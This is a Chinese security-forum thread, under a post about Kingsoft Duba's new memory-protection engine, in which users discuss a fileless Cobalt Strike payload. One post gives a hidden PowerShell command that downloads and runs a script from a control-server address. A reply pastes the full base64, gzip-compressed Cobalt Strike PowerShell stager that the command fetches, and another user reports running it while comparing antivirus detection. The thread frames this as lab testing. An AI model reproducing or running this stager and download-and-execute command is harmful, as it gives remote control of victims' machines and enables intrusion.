楼主: 鸦口无盐
收起左侧

[金山] 毒霸V15本周版本新增内存防护引擎,可防御无文件攻击

[复制链接]
kuroandsan
发表于 2022-8-16 16:58:02 | 显示全部楼层
四舍五入等于ATD(大雾
pal家族
发表于 2022-8-16 17:05:46 | 显示全部楼层
dsb2466 发表于 2022-8-16 16:58
我真的不是DB官人,我现在是粉丝

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.40.130:80/a'))"
这个为啥是cobalt
求专业人士解答
dsb2466
头像被屏蔽
发表于 2022-8-16 17:28:07 | 显示全部楼层
本帖最后由 dsb2466 于 2022-8-16 17:33 编辑
pal家族 发表于 2022-8-16 17:05
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.4 ...

0、倒不是说这个地址一定就是Cobalt Strike,重点其实是那个地址里面的内容,决定了这是啥东西。


1、截图这个地址,其实是Cobalt Strike生成器默认自动生成Payload的地址,我选的powershell就会生成第二张图的PS命令行,192.168.40.130是我自己控制端的CC地址:



2、生成的powershell命令行就是前面截图中的结构:


3、地址中的内容如下:
  1. $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("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"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
复制代码



4、2个虚拟机就可以自己完整模拟CS的控制与被控制了,嘿嘿




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 2人气 +6 收起 理由
pal家族 + 3
隔山打空气 + 3 版区有你更精彩: )

查看全部评分

pal家族
发表于 2022-8-16 17:55:09 | 显示全部楼层
dsb2466 发表于 2022-8-16 17:28
0、倒不是说这个地址一定就是Cobalt Strike,重点其实是那个地址里面的内容,决定了这是啥东西。

我可以自己试试嘛?
要不你把payload地址换一个都能访问的地址,我们来玩一玩
pal家族
发表于 2022-8-16 17:57:44 | 显示全部楼层
本帖最后由 pal家族 于 2022-8-16 18:00 编辑
dsb2466 发表于 2022-8-16 17:28
0、倒不是说这个地址一定就是Cobalt Strike,重点其实是那个地址里面的内容,决定了这是啥东西。

我直接用你给的payload试了下



另外毒霸的杀毒能力实在堪忧
https://opentip.kaspersky.com/09 ... 52442F512135A9BFFF/

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
dsb2466
头像被屏蔽
发表于 2022-8-16 17:59:57 | 显示全部楼层
pal家族 发表于 2022-8-16 17:57
我直接用你给的payload试了下

哈哈,你会了
pal家族
发表于 2022-8-16 18:00:44 | 显示全部楼层
本帖最后由 pal家族 于 2022-8-16 18:03 编辑

加强下杀毒能力
这脚本毒霸竟然不能杀 。。。卡巴直接启发了
https://opentip.kaspersky.com/09 ... 52442F512135A9BFFF/ ‘’‘
dsb2466
头像被屏蔽
发表于 2022-8-16 18:19:27 | 显示全部楼层
pal家族 发表于 2022-8-16 18:00
加强下杀毒能力
这脚本毒霸竟然不能杀 。。。卡巴直接启发了
https://opentip.kaspersky.com/09 ... 52 ...

啊这。。。得找DB官人了
00006666
发表于 2022-8-16 18:24:13 | 显示全部楼层
dsb2466 发表于 2022-8-16 17:28
0、倒不是说这个地址一定就是Cobalt Strike,重点其实是那个地址里面的内容,决定了这是啥东西。

cs这个东西不是一般都是生成shellcode,然后再放别的加载器里面的,应该很少是直接生成PS1或者exe啥的吧……
00006666
发表于 2022-8-16 18:25:56 | 显示全部楼层
本帖最后由 00006666 于 2022-8-16 19:09 编辑

编辑
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-23 02:55 , Processed in 0.093985 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表